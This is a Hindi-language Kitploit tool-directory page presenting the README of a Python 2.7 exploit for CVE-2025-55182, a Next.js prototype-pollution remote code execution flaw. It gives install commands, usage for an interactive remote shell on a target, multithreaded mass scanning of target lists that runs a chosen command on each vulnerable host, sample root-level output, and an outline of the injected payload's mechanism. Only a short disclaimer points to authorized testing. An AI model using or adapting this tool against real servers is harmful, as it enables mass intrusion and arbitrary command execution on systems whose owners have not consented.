Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-React2shell — CVE-2025-55182 एक्सप्लॉइट टूल – Next.js प्रोटोटाइप प्रदूषण के माध्यम से RCE की ओर ले जाने वाला Python 2.7 एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

CVE-2025-55182 एक्सप्लॉइट टूल – Next.js प्रोटोटाइप प्रदूषण के माध्यम से RCE की ओर ले जाने वाला Python 2.7 एक्सप्लॉइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
612 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 - React2shell

CVE-2025-55182 के लिए एक Python 2.7 एक्सप्लॉइट – Next.js अनुप्रयोगों में एक महत्वपूर्ण प्रोटोटाइप प्रदूषण / RCE भेद्यता।
यह उपकरण एकल-लक्ष्य इंटरैक्टिव शेल और बहु-होस्ट का सामूहिक स्कैनिंग दोनों की अनुमति देता है, जिसमें मल्टीथ्रेडिंग, रंगीन आउटपुट और स्वचालित HTTPS फ़ॉलबैक शामिल है।


🚀 विशेषताएँ

  • ✅ इंटरैक्टिव शेल – एकल लक्ष्यों के लिए, मनमाना सिस्टम कमांड निष्पादित करें
  • ✅ सामूहिक स्कैन – फ़ाइल सूची से, मल्टीथ्रेडेड, तेज़, परिणाम स्वचालित रूप से सहेजे जाते हैं
  • ✅ स्वतः पहचान – एकल URL → शेल मोड, मौजूदा फ़ाइल → सामूहिक स्कैन मोड
  • ✅ स्वचालित HTTPS – यदि प्रोटोकॉल नहीं दिया गया है तो https:// जोड़ता है
  • ✅ थ्रेड-सुरक्षित फ़ाइल लेखन – वास्तविक समय में संवेदनशील परिणाम सहेजता है
  • ✅ कस्टम कमांड – डिफ़ॉल्ट id को किसी भी कमांड (whoami, ls, आदि) में बदलें
  • ✅ कोई बाहरी निर्भरता नहीं – केवल requests (आसानी से स्थापित करने योग्य)

📋 आवश्यकताएँ

  • Python 2.7 (उपकरण विशेष रूप से Python 2.7 के लिए लिखा गया है)
  • requests लाइब्रेरी – इसे स्थापित करें:
    root@kitploit:~
    pip install requests
    

· एक टर्मिनल जो ANSI रंगों का समर्थन करता है (अधिकांश Linux/macOS टर्मिनल, Windows Terminal, PowerShell)

📦 स्थापना

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

स्क्रिप्ट को निष्पादन योग्य बनाएं (वैकल्पिक):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 उपयोग

1. इंटरैक्टिव शेल (एकल लक्ष्य)

root@kitploit:~
python2 CVE-2025-55182.py https://target.com

या प्रोटोकॉल के बिना (HTTPS स्वचालित रूप से जोड़ा जाता है):

root@kitploit:~
python2 CVE-2025-55182.py target.com

एक बार कनेक्ट होने और संवेदनशील सत्यापित होने पर, आपको एक शेल प्रॉम्प्ट मिलता है:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

अंतर्निर्मित कमांड:

· exit / quit – शेल बंद करें · clear – स्क्रीन साफ़ करें · help – सहायता दिखाएँ

2. सामूहिक स्कैन (लक्ष्यों की सूची)

एक फ़ाइल तैयार करें जिसमें प्रति पंक्ति एक लक्ष्य हो (http/https के साथ या बिना):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

सामूहिक स्कैन चलाएँ (डिफ़ॉल्ट: 10 थ्रेड, कमांड id, आउटपुट res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

थ्रेड्स, कमांड, आउटपुट फ़ाइल को अनुकूलित करें:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt

· 20 – थ्रेड्स की संख्या · whoami – प्रत्येक संवेदनशील लक्ष्य पर निष्पादित करने के लिए कमांड · results.txt – आउटपुट फ़ाइल (केवल संवेदनशील प्रविष्टियाँ सहेजी जाती हैं)

सामूहिक स्कैन आउटपुट उदाहरण:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

सहेजे गए परिणाम (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 यह कैसे काम करता है

एक्सप्लॉइट Next.js एप्लिकेशन (/login जोड़ा जाता है यदि पथ खाली है) के लिए एक नकली मल्टीपार्ट/फ़ॉर्म-डेटा अनुरोध भेजता है। यह child_process.execSync() का उपयोग करके एक सिस्टम कमांड निष्पादित करने वाले दुर्भावनापूर्ण उपसर्ग को इंजेक्ट करने के लिए प्रोटोटाइप प्रदूषण (proto:then और constructor:constructor) का दुरुपयोग करता है।

सर्वर x-action-redirect हेडर (या Location) में कमांड आउटपुट के साथ 303 रीडायरेक्ट के साथ प्रतिक्रिया करता है। उपकरण /login?a= से परिणाम निकालता है।


🛡️ अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व नहीं मानता है। इस एक्सप्लॉइट का उपयोग करने से पहले आपके पास लक्ष्य प्रणाली के स्वामी से स्पष्ट लिखित अनुमति होनी चाहिए।

अधिक अस्वीकरण आप Jenderal92 के कवर पर देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं।

टूल डाउनलोड करें